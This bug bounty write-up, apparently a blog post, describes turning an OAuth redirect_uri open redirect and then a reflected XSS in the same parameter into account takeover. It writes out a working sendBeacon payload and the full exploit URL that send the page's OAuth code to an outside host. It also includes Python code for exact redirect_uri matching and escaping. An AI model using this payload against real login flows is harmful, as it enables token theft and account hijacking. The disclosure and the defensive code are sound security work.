Never Give Up, The Story Behind a Dupe To a Triaged


Alan Brian @soyelmago

This is the story of how I got a dupe (within 24 hours!) and then found another (valid) vulnerability with the same impact.


The application used OAuth to authenticate. The endpoint looked like this:
https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=https://www.victim.com/dashboard&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

After seeing that, I quickly changed the redirect_uri parameter to my server and saw the application redirect me there… so at this point I had found an Open Redirect vulnerability on victim.com. Let's turn it into an Account Takeover!

So, in my PoC, I simply made the redirect_uri parameter point to my server, and nothing more, because the OAuth code is sent in the request too. That was easy. I wrote the report, sent it, and after 3 days I got the duplicate…

Yes, I know what you are thinking: that was very low-hanging fruit, but… I needed to try, and that's what this story is about: keep trying!


Keep trying

I thought for a while about how to achieve the same (Account Takeover) with a different technique. And an idea popped into my mind, like the popup in an XSS vulnerability ;-)

If I could exploit an XSS vulnerability in that endpoint, maybe I could steal the OAuth token. So I made the following PoC:

https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=https://www.victim.com/dashboard%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

And it worked!


But what makes the difference between a simple JavaScript popup and ATO (Account Takeover)? A cool payload, so let's try to figure it out (thanks @mastersec!)

Final Payload:

navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.documentElement.innerHTML.split('code'));

Final URL:

https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=aaa"><script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.documentElement.innerHTML.split('code'));</script>&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

ssrftest.com is a site that allows you to test, for example, SSRF vulnerabilities.

And the result was the token submitted to the server I control. WIN
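As an added illustration (not code from the original write-up or from the affected application), here is how the authorization endpoint should have handled redirect_uri: compare it exactly against the URIs registered for the client (no prefix matching), refuse to redirect on any mismatch, and HTML-escape whatever it echoes back. That closes both the open redirect and the reflected XSS above. The client id and registered URI are assumed sample values.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Redirect URIs registered per client (constructed sample values; the write-up
# redacts the real client_id). Matching is exact, as the OAuth 2.0 security BCP
# recommends, so "https://www.victim.com/dashboard<anything>" never matches.
REGISTERED_REDIRECT_URIS = {
    "client-123": {"https://www.victim.com/dashboard"},
}


def redirect_uri_is_valid(client_id: str, redirect_uri: str) -> bool:
    """True only if redirect_uri exactly equals a URI registered for client_id."""
    if redirect_uri not in REGISTERED_REDIRECT_URIS.get(client_id, set()):
        return False
    parts = urlsplit(redirect_uri)
    # Defence in depth: registered targets must be https and carry no fragment.
    return parts.scheme == "https" and parts.fragment == ""


def handle_authorize(url: str) -> tuple:
    """Decide what /auth does with the request URL.

    Returns ("redirect", target) for a valid redirect_uri, otherwise
    ("error", html_body). A mismatching redirect_uri is never followed, and
    the value echoed into the error page is escaped so a payload such as
    '"><script>...' is rendered as text, not executed.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    client_id = query.get("client_id", [""])[0]
    redirect_uri = query.get("redirect_uri", [""])[0]
    if redirect_uri_is_valid(client_id, redirect_uri):
        return ("redirect", redirect_uri)
    body = "<p>Invalid redirect_uri: %s</p>" % html.escape(redirect_uri, quote=True)
    return ("error", body)


if __name__ == "__main__":
    # Constructed requests: the legitimate one and the XSS attempt from the write-up.
    good = ("https://victim.com/auth?client_id=client-123&response_type=code"
            "&redirect_uri=https://www.victim.com/dashboard")
    xss = ("https://victim.com/auth?client_id=client-123&response_type=code"
           "&redirect_uri=https://www.victim.com/dashboard%22%3e%3cscript%3e"
           "alert%28document.domain%29%3c%2fscript%3e")
    print(handle_authorize(good))
    print(handle_authorize(xss))
```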

I submitted the vulnerability and finally, after 2 days, it got triaged and I got the bounty $$$ :-)


So, always remember, KEEP TRYING!

I hope you enjoyed this write-up. Happy Hacking-Hunting!

Hope you liked the post! If you would like to contact me, please visit https://www.cintainfinita.com or write to contact@cintainfinita.com.ar.

#BugBounty #BugBountyTips #Hacking
